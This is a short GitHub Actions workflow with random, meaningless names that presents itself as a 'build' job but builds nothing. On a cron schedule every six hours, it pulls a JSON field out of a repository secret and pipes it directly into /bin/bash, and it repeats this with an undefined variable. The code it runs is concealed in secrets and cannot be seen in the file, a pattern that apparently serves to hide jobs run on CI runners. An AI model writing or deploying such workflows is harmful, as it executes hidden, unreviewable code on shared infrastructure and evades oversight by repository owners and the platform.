name: conjixuj

on:
  workflow_dispatch:
  schedule:
    - cron: '9 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: conjixuj
        env:
          goqs55: ${{ secrets.goqs55 }}
        run: |
          echo $goqs55 | jq -r .l67 | /bin/bash
          echo $qgoeg44 | jq -r .tg94 | /bin/bash

